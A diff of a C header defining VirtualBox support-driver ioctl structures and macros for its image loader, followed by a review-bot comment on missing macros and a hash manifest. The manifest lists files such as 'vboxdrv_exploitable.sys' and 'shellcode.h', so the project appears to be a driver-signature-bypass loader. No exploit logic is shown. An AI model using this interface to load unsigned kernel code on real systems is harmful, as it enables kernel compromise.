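+/** Session cookie. */
+uint32_t u32SessionCookie;
+/** Interface version for this session. */
+uint32_t u32SessionVersion;
+/** The actual interface version in the driver. */
+uint32_t u32DriverVersion;
+/** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */
+uint32_t cFunctions;
+/** Session handle. */
+/*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession;
+} Out;
+} u;
+} SUPCOOKIE, *PSUPCOOKIE;
+typedef struct _SUPLDROPEN {
+/** The header. */
+SUPREQHDR Hdr;
+union
+{
+struct
+{
+/** Size of the image we'll be loading. */
+uint32_t cbImage;
+/** Image name.
+* This is the NAME of the image, not the file name. It is used
+* to share code with other processes. (Max len is 32 chars!) */
+char szName[32];
+} In;
+struct
+{
+/** The base address of the image. */
+RTR0PTR pvImageBase;
+/** Indicate whether or not the image requires loading. */
+BOOLEAN fNeedsLoading;
+} Out;
+} u;
+} SUPLDROPEN, *PSUPLDROPEN;
+typedef enum _SUPLDRLOADEP {
+SUPLDRLOADEP_NOTHING = 0,
+SUPLDRLOADEP_VMMR0,
+SUPLDRLOADEP_SERVICE,
+SUPLDRLOADEP_32BIT_HACK = 0x7fffffff
+} SUPLDRLOADEP;
+typedef struct _SUPSETVMFORFAST {
+/** The header. */
+SUPREQHDR Hdr;
+union
+{
+struct
+{
+/** The ring-0 VM handle (pointer). */
+PVOID pVMR0;
+} In;
+} u;
+} SUPSETVMFORFAST, *PSUPSETVMFORFAST;
+typedef struct _SUPLDRLOAD
+{
+/** The header. */
+SUPREQHDR Hdr;
+union
+{
+struct
+{
+/** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */
+PVOID pfnModuleInit;
+/** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */
+PVOID pfnModuleTerm;
+/** Special entry points. */
+union
+{
+/** SUPLDRLOADEP_VMMR0. */
+struct
+{
+/** The module handle (i.e. address). */
+RTR0PTR pvVMMR0;
+/** Address of VMMR0EntryInt function. */
+RTR0PTR pvVMMR0EntryInt;
+/** Address of VMMR0EntryFast function. */
+RTR0PTR pvVMMR0EntryFast;
+/** Address of VMMR0EntryEx function. */
+RTR0PTR pvVMMR0EntryEx;
+} VMMR0;
+/** SUPLDRLOADEP_SERVICE. */
+struct
+{
+/** The service request handler.
+* (PFNR0SERVICEREQHANDLER isn't defined yet.) */
+RTR0PTR pfnServiceReq;
+/** Reserved, must be NIL. */
+RTR0PTR apvReserved[3];
+} Service;
+} EP;
+/** Address. */
+RTR0PTR pvImageBase;
+/** Entry point type. */
+SUPLDRLOADEP eEPType;
+/** The offset of the symbol table. */
+uint32_t offSymbols;
+/** The number of entries in the symbol table. */
+uint32_t cSymbols;
+/** The offset of the string table. */
+uint32_t offStrTab;
+/** Size of the string table. */
+uint32_t cbStrTab;
+/** Size of image (including string and symbol tables). */
+uint32_t cbImage;
+/** The image data. */
+char achImage[1];
+} In;
+} u;
+} SUPLDRLOAD, *PSUPLDRLOAD;
+#define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) )
+#define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */
+#define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In)
+#define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out)
+#define SUP_IOCTL_FLAG 128
+#define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl)
+/** The magic value. */
+#define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042)
+/** The default value. Use this when no special stuff is requested. */
+#define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC
+#define VERR_INTERNAL_ERROR (-225)
+#define SUPCOOKIE_MAGIC "The Magic Word!"
+#define SUPDRV_IOC_VERSION 0x001a0007
+/** The request size. */
+#define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE)
+/** Negotiate cookie. */
+#define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE)
+/** There is extra input that needs copying on some platforms. */
+#define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100)
+/** There is extra output that needs copying on some platforms. */
+#define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200)
+/** @name SUP_IOCTL_SET_VM_FOR_FAST
+* Set the VM handle for doing fast call ioctl calls.
+* @{
+*/
+#define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN sizeof(SUPSETVMFORFAST)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR)
+#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66)
+#define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE)
+#define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN)
+#define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN)
+#define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out))
+#define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6)
+#define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
+#define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
+#define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR)
+/** @name SUP_IOCTL_LDR_FREE
+* Free an image.
+* @{
+*/
+#define SUP_IOCTL_LDR_FREE SUP_CTL_CODE_SIZE(7, SUP_IOCTL_LDR_FREE_SIZE)
+#define SUP_IOCTL_LDR_FREE_SIZE sizeof(SUPLDRFREE)
+#define SUP_IOCTL_LDR_FREE_SIZE_IN sizeof(SUPLDRFREE)
+#define SUP_IOCTL_LDR_FREE_SIZE_OUT sizeof(SUPREQHDR)
+typedef struct _SUPLDRFREE {
+/** The header. */
+SUPREQHDR Hdr;
+union
+{
+struct
+{
+/** Address. */
+RTR0PTR pvImageBase;
+} In;
+} u;
+} SUPLDRFREE, *PSUPLDRFREE;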
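Review bot: RT_UOFFSETOF, used by SUP_IOCTL_LDR_LOAD_SIZE and SUP_IOCTL_LDR_LOAD_SIZE_IN, is not defined in this header although its companion RT_SIZEOFMEMB is; unless another header in the project supplies it, a definition next to RT_SIZEOFMEMB, `#define RT_UOFFSETOF(type, member) ( (size_t)&(((type *)(void *)0)->member) )`, keeps the header self-contained and the size macros usable. SUP_IOCTL_COOKIE_SIZE_IN and SUP_IOCTL_COOKIE_SIZE_OUT also expand to an unparenthesized `sizeof(SUPREQHDR) + RT_SIZEOFMEMB(...)`, unlike SUP_IOCTL_LDR_OPEN_SIZE_OUT, so a use such as `n * SUP_IOCTL_COOKIE_SIZE_IN` binds wrongly; wrapping both bodies in parentheses matches the LDR_OPEN form.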

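--- a/TDL.sha256
+++ b/TDL.sha256
@@ -0,0 +1,47 @@
+c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
+4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
+48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
+01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
+2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
+d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
+da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
+2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
+f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
+d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
+a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
+cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
+10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
+c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
+746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
+3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
+cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
+01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
+c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
+b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
+2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
+1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
+c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
+964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
+8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
+893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
+bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
+107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
+b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Furutaka\minirtl\rtltypes.h
+e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\Furutaka\minirtl\u64tohex.c
+4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\Furutaka\minirtl\u64tostr.c
+f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\Furutaka\minirtl\ultohex.c
+9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Furutaka\minirtl\ultostr.c
+83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\Furutaka\minirtl\_strcat.c
+ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutaka\minirtl\_strcmpi.c
+969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\Furutaka\minirtl\_strcpy.c
+27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
+60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
+87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c
+8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
+fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
+8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
+a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
+2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
+d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
+12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h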